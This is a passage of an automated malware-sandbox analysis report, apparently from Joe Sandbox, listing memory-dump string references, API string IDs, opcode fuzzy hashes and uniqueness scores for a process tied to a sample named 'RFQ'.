                                                                                                        • kLsE, xrefs: 01A30540
                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A3063D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                        • API String ID: 0-2547482624
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 01A3A2FB
                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 01A3A309
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                        • API String ID: 0-2876891731
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: MUI
                                                                                                        • API String ID: 0-1339004836
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: GlobalTags
                                                                                                        • API String ID: 0-1106856819
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .mui
                                                                                                        • API String ID: 0-1199573805
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: EXT-
                                                                                                        • API String ID: 0-1948896318
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryHash
                                                                                                        • API String ID: 0-2202222882
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #
                                                                                                        • API String ID: 0-1885708031
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01AB895E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                        • API String ID: 0-702105204
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                        • Instruction ID: 209c6bb535ed234c667bfcce09f1183b54da63a4e14437c396126fce5a1e287b
                                                                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                        • Instruction Fuzzy Hash: 2BB13D71E0061ADFDF2ACF99C984AADBBB5FF48310F1481A9E915A7390D730AD45CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0fda75d6c1535aa6498c725aca6fb294dbbba6237ef0ea09ce4e061581336e10
                                                                                                        • Instruction ID: dee429198cce276245e60b1092a13fadf036d4ef111c676ffa77cbd4ffbf9351
                                                                                                        • Opcode Fuzzy Hash: 0fda75d6c1535aa6498c725aca6fb294dbbba6237ef0ea09ce4e061581336e10
                                                                                                        • Instruction Fuzzy Hash: 6891B171D00256AFDB15CFA9D8C4BFEBFB9AF48710F154169EA19AB342D734D9008BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fd07f769d54f652b0ecdc6817533522b6c5ca986b7239543565d8601f4b186f9
                                                                                                        • Instruction ID: 4b59b61aaddadfffeca43ba5084432385b8706ed64671c4d3aae43131723aac2
                                                                                                        • Opcode Fuzzy Hash: fd07f769d54f652b0ecdc6817533522b6c5ca986b7239543565d8601f4b186f9
                                                                                                        • Instruction Fuzzy Hash: 02912331A00622DBEB25DB68C980BBEBBF1FFD4714F098069ED059B251E738D941C792
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a15827913d8eeff7d598d4462c106f45577af2122516e37989a9b11daa22f0ea
                                                                                                        • Instruction ID: d0cc6a06c5c8314aa3ab7ce661665feeaaf8cc2180dc9166785e295106fcc130
                                                                                                        • Opcode Fuzzy Hash: a15827913d8eeff7d598d4462c106f45577af2122516e37989a9b11daa22f0ea
                                                                                                        • Instruction Fuzzy Hash: AB81A4B1E006169BEB25DF69C940ABEBBF9FF48700F04852EE449D7640E334D941CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                        • Instruction ID: 6a72f104e7725033707b84ebca5d89e0f10222de45bb753ccdbad158419a1c04
                                                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                        • Instruction Fuzzy Hash: 22817131A002099FDF19CFD9C590AAEBBB6AF84310F18856DEA199B385D734D906CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b0cd540807d6b58b550c9f2102cf206af8fd0fcdf4c9981c072cef582dc37f21
                                                                                                        • Instruction ID: 79da00344aa2eeefbd9a6bf7722f9f88e9bfa32aa1964804c15e1cbc366dce63
                                                                                                        • Opcode Fuzzy Hash: b0cd540807d6b58b550c9f2102cf206af8fd0fcdf4c9981c072cef582dc37f21
                                                                                                        • Instruction Fuzzy Hash: 34818E75A00609EFDB25CFA9C980BEEBBFAFF88354F144429E555A7250D730AC05CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d167ae2bb841ab9fd52a0af5951c1ba55a083a6d1f543be8c92e4fea9ff59123
                                                                                                        • Instruction ID: c20afebd32764ea750579d451c152858c673e0170b18d48186b25d64e54c5f21
                                                                                                        • Opcode Fuzzy Hash: d167ae2bb841ab9fd52a0af5951c1ba55a083a6d1f543be8c92e4fea9ff59123
                                                                                                        • Instruction Fuzzy Hash: 2D71DFB5D05269DBCB25CF59C8907BEBBF0FF99720F18411AE846AB354D7389844CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 393cd995104f7ad9b73b64c054f5d392e5e065b92cc15e25a1ab6082c6742852
                                                                                                        • Instruction ID: 3bb71c21b32faf613d9f6e9c12e5d7d340c794cba3614de05c4450ca09493c5c
                                                                                                        • Opcode Fuzzy Hash: 393cd995104f7ad9b73b64c054f5d392e5e065b92cc15e25a1ab6082c6742852
                                                                                                        • Instruction Fuzzy Hash: 0D71B6B0A00209EFDB34EF99DA48E9ABBFCFF98350F10415AEA14E7258D7359944CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5bf2b2a069265fc26746114b1fef6f9ebc5fc385a30e6a3fb6c6f431d24b3b63
                                                                                                        • Instruction ID: b9168b0f9a1f685f9fea80466b12f7328e0cd72098c08d2f85b4791e60c6dc9d
                                                                                                        • Opcode Fuzzy Hash: 5bf2b2a069265fc26746114b1fef6f9ebc5fc385a30e6a3fb6c6f431d24b3b63
                                                                                                        • Instruction Fuzzy Hash: 3071AD356046428FD712DF28D484B2AB7E5FFC8310F0885AAF8998B352DB74D845CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                        • Instruction ID: 7fa1aae7dc732d5122aed7dc892adf58a5e4a0049f261bafd6c87c156b16c68d
                                                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                        • Instruction Fuzzy Hash: 09716F71E0065AAFDB10DFA9CA84EEEBBB8FF88710F104569E505A7251DB34EA05CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8c0c2456f622bd4e72bff3031cfca2b78b858c5c4f35f857b8a9ab43f8be5f56
                                                                                                        • Instruction ID: f78049e3a00f3d798cf93e5f7134845f95d840f820832cd61e75414cbabc4169
                                                                                                        • Opcode Fuzzy Hash: 8c0c2456f622bd4e72bff3031cfca2b78b858c5c4f35f857b8a9ab43f8be5f56
                                                                                                        • Instruction Fuzzy Hash: CB71D232240701AFEB32DF18CA44F66BBB6EF44B60F14452CE6599B3A1D775E944CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5d842bc2b55e51a495580a4519921644fe83067451196ce3c9b0096799540233
                                                                                                        • Instruction ID: 4a3ea0f4eb310a7b9e7117a9af125b5cdf9d043cc134a83c790e33c980edfc1b
                                                                                                        • Opcode Fuzzy Hash: 5d842bc2b55e51a495580a4519921644fe83067451196ce3c9b0096799540233
                                                                                                        • Instruction Fuzzy Hash: D581D372A043469FDF28DF98D584BAEBBF1BF88310F15426AE9046B685C7349D80CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e17660ee823adad911d0a7ac446b271358a43884b3fa36fce43b18019b5b8a3f
                                                                                                        • Instruction ID: ac2cd6e6754e99e7894e3471ce7239530da2f427506d8e50caae3c92996fecaf
                                                                                                        • Opcode Fuzzy Hash: e17660ee823adad911d0a7ac446b271358a43884b3fa36fce43b18019b5b8a3f
                                                                                                        • Instruction Fuzzy Hash: 28711971E00219AFDF16DF94CD81FEEBBB9FF44350F104269E611A6290D774AA05CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f1ec3657616d2179c6e144bdc7e9f939ca276082f9d259607e0930253c4b5209
                                                                                                        • Instruction ID: 2a6168091425ea3faa14f96c1b2e2bc570e940d38cf440fb506eba2db122c31b
                                                                                                        • Opcode Fuzzy Hash: f1ec3657616d2179c6e144bdc7e9f939ca276082f9d259607e0930253c4b5209
                                                                                                        • Instruction Fuzzy Hash: 1B51CF72504712AFD722DE68C988E5BBBE8EBC8750F014929FA41DB151D770ED05CBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f140711b12bebde7cea1bc4034b07e1196497804f904b214b550433d16be6d58
                                                                                                        • Instruction ID: a963d4047ab0f0a11361cb003073c3315e5c747027b81568492aba1d883b2781
                                                                                                        • Opcode Fuzzy Hash: f140711b12bebde7cea1bc4034b07e1196497804f904b214b550433d16be6d58
                                                                                                        • Instruction Fuzzy Hash: B751B070900B05DFD721DFAAC980AABFBF8BF94710F10461ED297976A1C774A545CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bbcb9b77f65b1a33b4c6e5b4e444f984e503744a73247414f70ee6c413d00abd
                                                                                                        • Instruction ID: b769ab3009c102277847e39c383d5b388d74194d22d8916266dd1e2a4c24f929
                                                                                                        • Opcode Fuzzy Hash: bbcb9b77f65b1a33b4c6e5b4e444f984e503744a73247414f70ee6c413d00abd
                                                                                                        • Instruction Fuzzy Hash: 4B516871200A15DFCB22EFA9CA84FAAB7FDFF58784F40042AE54297661E734E944CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c91f52adbc9ab24779745d78d3b9964ac735b1ba89edfb4faedf7236b374871b
                                                                                                        • Instruction ID: 70c9a9b0eb11333550f6a3e44e0780453cb921b595c555ced51caeef3ed85809
                                                                                                        • Opcode Fuzzy Hash: c91f52adbc9ab24779745d78d3b9964ac735b1ba89edfb4faedf7236b374871b
                                                                                                        • Instruction Fuzzy Hash: C95187B16087028FD754DF2DC980A6BBBE5BFC8208F44492DF59AC7650EB30DA05CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                        • Instruction ID: e43f8d9b91aa5f8a64e4b4774049da826006771f44ea4a45b65ef6b7aa1e5368
                                                                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                        • Instruction Fuzzy Hash: 0F519271E0821AABDF55DF94C940BEEBBF5AF49754F044069EE01AB240E734ED84CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                        • Instruction ID: b16524437626dfc8eaf3c1431d016119bab96a566c8405dd2a709062289919bb
                                                                                                        • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                        • Instruction Fuzzy Hash: 0C51A571D0025AEFEF219B94CDD4BEEBBBDEF00324F158669E51267192D7309E448BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2e569581cfa1f4c158bcc575860f5ca8d85d3416432f580d2901794628128719
                                                                                                        • Instruction ID: 3390bebbd110fe3528324bd64e84e71831abe0fe48772a63a0a9d7c6fb5a263d
                                                                                                        • Opcode Fuzzy Hash: 2e569581cfa1f4c158bcc575860f5ca8d85d3416432f580d2901794628128719
                                                                                                        • Instruction Fuzzy Hash: 2941E5707016159BD729DBADC995B7FBB9AEF90620F08821DFB55C7280DB3CD802C691
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7c55285ea155623d3e26aa69e77b1806a0591deafa45fc7b0120c9eb8730cb8f
                                                                                                        • Instruction ID: 65b7dfa7ce27107a901056882d2b20fa543b54d70c85dece887a047504e26e1d
                                                                                                        • Opcode Fuzzy Hash: 7c55285ea155623d3e26aa69e77b1806a0591deafa45fc7b0120c9eb8730cb8f
                                                                                                        • Instruction Fuzzy Hash: 12518E75A00256DFCB30DFA9C9C0EEEBBB9FF98324B144519E905A730AD730A905CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 29e7f2552fba67b3cc51d5ad25d2e35a26053094110be9d0e908172fdf94475a
                                                                                                        • Instruction ID: 3dcd470af3f08e1582104f531ae4d2086c4d48cc2ac70ea82e01226cc991bc54
                                                                                                        • Opcode Fuzzy Hash: 29e7f2552fba67b3cc51d5ad25d2e35a26053094110be9d0e908172fdf94475a
                                                                                                        • Instruction Fuzzy Hash: 734139717402219BCB39EF68DD80B6A7779EB55318F04102DEE0AAB242D7B1D804CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                        • Instruction ID: c3a4143c3e5aef6de10b6fd1ae9af26eb04e83859ba0c645f62d26e976db2721
                                                                                                        • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                        • Instruction Fuzzy Hash: 8641FA716047169FD725DFA8C984AAAB7A9FF80210F05462EFB5A87240EB31ED1CC7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 01652c5fb0eee98a61bebac3d462f1548ef70fcad4fe4881e724bcd7acecca0a
